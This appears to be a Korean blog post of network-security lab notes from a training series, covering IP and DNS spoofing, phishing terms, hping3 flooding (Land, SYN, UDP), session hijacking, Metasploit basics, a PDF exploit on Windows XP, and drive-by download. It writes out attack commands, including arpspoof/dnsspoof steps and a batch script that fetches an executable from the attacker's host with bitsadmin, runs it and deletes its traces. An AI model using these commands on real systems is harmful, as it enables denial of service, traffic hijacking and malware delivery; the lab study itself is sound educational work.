MAC 스푸핑
엉뚱하지 않는 Mac 주소면 변경이 가능하다
빅데이터 인공지능 openstack ssl 해킹
- IP 스푸핑
hping3 [목적지IP] -a [위장할 IP]
- DNS 스푸핑
일반적으로 DNS 서버를 통해 사용자들은 어떠한 인증 절차도 없이 인터넷을한다.
즉, 사용자가 도메인에 질의 했을 때 DNS서버보다 먼저 (해킹에 이용할) IP주소를 알려주면 사용자는 해커의 웹서버로 접속할수있게할수있다.
- DNS 스푸핑 실습
1) 엉뚱한 웹 서버 만들기
Kali에서 /var/www/html에 모든 파일을 지우고
index.html을 생성
2) DNS 스푸핑
Kali에서 (아무곳에나)
vi dnsspoof 파일 생성
내용 : [해커의 웹서버 Ip] [속일 도메인]
해커 웹서버 (예시) 192.168.1.130 , 192.168.1.130 ....
속일 도메인 (예시) *.naver.com , *.nate.com ....
2-1) DNS 스푸핑 공격
1. arpspoof -t [xp의 IP] [XP의 GW의 IP] 실행
2. arpspoof -t [XP의 GW의 IP] [xp의 IP] 실행
3. fragrouter -B1
4. dnsspoof -i eth0 -f ./dnsspoof
- DNS 스푸핑 실습 (스미싱,파밍,피싱)
- 피싱
비슷한 도메인 주소로 사용자들을 낚는 것
- 스미싱
문자로 낚는 것 // 가짜 NAVER를 만들어 아이디같은것을 빼돌리는 수법
- 파밍
DNS 스푸핑과 같은 정상적인 도메인을 이용하더라도 잘못된 사이트로 이동하게되는 공격
- DoS & DDoS 공격종류
Denial of Service, 서비스 거부 공격
Distributed Denial of Service, 분산 서비스 거부 공격
- Teardrop 공격 (DDoS공격)
정상적으로 패킷을 자르지 않고 막 찢어서 전송되게 만들면, 시스템이 그것을 맞출려고 네트워크 자원을 사용한다.
그로인해 컴퓨터가 먹통이된다.
- Land 공격 (DDoS공격)
패킷을 전달할때 출발지 IP 주소를 타깃의 IP로 조작한 패킷을 타깃에게 전송
명령어 ) hping3 [타깃 IP] -a [타깃 IP] --flood --icmp
Syn Flooding 공격 (DDoS공격)
SYN 패킷을 무수히 만힝 보내서 서버가 SYN_RECEIVED 상태로 ACK 패킷을 계속 기다리느라 모든자원을 사용하게함
명령어 ) hping3 [타킷 ip] -p 80 -S --flood
UDP Flooding 공격 (DDoS공격)
무수히 많은 UDP 데이터 패킷을 보내서 상대방의 대역폭을 모두 잠식하는 공격
명령어 ) hping3 [타깃 IP] -2 --flood --rand-source -d 100 -p 80
드라이브 바이 다운로드
웹 브라우저의 취약점을 이용해서 특정 사이트를 접속하는 것만으로 악성코드가 다운로드되고 실행되서 감염까지되는 공격
프로토콜 이용한 해킹
- 세션 하이재킹 방법 1
준비할것
칼리 리눅스(해커) |
XP(서버, netcat) |
|
cmd.exe nc.exe -lvp 1234 |
- Kali
- XP
과정
1. 데이터 전송
2. hping3 -a [서버 IP] [클라 IP] -s [S포트] -p [C포트] -M [마지막 통신 Seq번호] -R -A -c 1
또 다른 세션 하이재킹 방법
1. CentOS서버준비
2. 클라이언트 준비
3. 명령어
칼리 |
cd hunt-1.5 -> ./hunt_static -> l //목록 보기(목록이 뜨지 않을 경우 텔넷을 다시 시작한다.) -> a (공격) -> 0 (타깃지정) -> 엔터X10 -> Ctrl + c -> 엔터X3 |
결과 화면
IP를 확인할수있음
최신 해킹
(1) 메타스플로잇 프레임워크
Rapid 7에서 취약점에 대한 정리와 해당 취약점을 이용해서 공격 테스트를 할 수 있는 각종 도구들을 제공
오픈소스로써 보안 취약점 및 침투 테스트 등에 대한 정보를 제공하는 것이 목적
1) 메타스플로잇 용어
exploit : 시스템이나 어플리케이션, 서비스 등의 취약점을 이용하여 공격하는 공격 행위, 또는 명령어
Shell Code : 공격이 수행될 때 페이로드로 사용되어지는 코드, 어셈블리어(기계어)로 만들어진다.
Payload : 타깃 PC에게 전달하는 정보, 쉘 코드나 다른 추가적인 정보를 담고 있다.
Module : 메타스플로잇에서 사용되는 작은 프로그램들, 특정 기능들 ex) reverse_shell
Listener : 메타스플로잇에서 사용되는 공격 중 원격 연결을 수행할 때 서버의 역할을 하는 시스템
2) 메타스플로잇을 이용하는 방법
(1) msfvenom 명령어를 이용
(2) msfconsole 명령어를 이용
PDF 문서 기반 공격
공격 대상 : Window XP SP3, Adobe Reader 9.3.0
필요한 기능을 추가(상대방이 나에게 접속하게 함)
칼리의 mdf파일을 xp에 넣어둠
접속할 때 까지 기다림
접속했을 경우 xp의 화면이캡쳐됨
xp에서 사용중인데 그것을 칼리에서 캡쳐한 화면
홈페이지 접속을 통한 방법
드라이브 바이 다운로드
웹브라우저의 취약점을 이용하여 특정 사이트를 접속하는 것 만으로도 악성코드에 감염되는 공격
god.html 파일을 수정함(Kali에서..)
파일 다운 명령어 (1.200 은 Kali인것으로 알고있음)
파일다운 명령어
god.html 화면(아무것도 안뜨는게 정상)
bitsadmin은 cmd로 url 파일을 다운 받을 수 있는 명령어
bitsadmin /transfer myjob/download/priority high 칼리ip hi.exe 저장될 경로 hi.exe
이동된 모습..
Kali 에서
test.bat 악성코드를 다운받는 스크립트
@echo off bitsadmin /transfer myjob /download /priority high http://칼리ip/hi.exe c:\test\hi.exe timeout 10 c:\test\hi.exe :REDO del c:\test\hi.exe if exist c:\test\hi.exe ( goto REDO ) else ( del c:\test\test.bat ) if exist c:\test\test.bat ( goto REDO ) else ( rd c:\test ) if exist c:\test\test.bat ( goto REDO ) |
악성코드가 다운되는 모습(테스트라서 진짜 악성코드는 아님)
공감(♥) 과 댓글은 필자에게 큰 힘이 됩니다. 잠시 1초만 내주시면 안될까요? ~~ 로그인 없이도 가능합니당 |
'클라우드 아키텍처 설계 기초지식 > 07 네트워크 보안' 카테고리의 다른 글
| 네트워크 보안 (3) - 최신해킹( SSL 취약점을 이용한 공격 ) (2) | 2018.10.26 |
|---|---|
| 네트워크 보안 (1) - 스니핑 해킹기법,스푸핑 해킹기법, 사이드 재킹 (0) | 2018.10.23 |
댓글